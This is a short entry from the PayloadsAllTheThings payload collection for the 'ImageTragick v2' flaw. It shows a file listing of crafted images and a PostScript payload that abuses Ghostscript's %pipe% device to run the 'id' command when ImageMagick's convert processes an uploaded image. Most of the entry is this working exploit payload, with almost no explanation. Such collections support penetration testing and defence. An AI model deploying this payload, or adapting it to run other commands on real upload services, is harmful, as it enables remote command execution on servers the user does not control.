PayloadsAllTheThings/Upload insecure files/Image Tragik 2
2018-11-17 14:40:12 +01:00
..
centos_id.jpg Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00
README.md ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
ubuntu_id.jpg Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00
ubuntu_shell.jpg Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00

Image Tragik 2

Exploit

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

then use convert shellexec.jpeg whatever.gif

Thanks to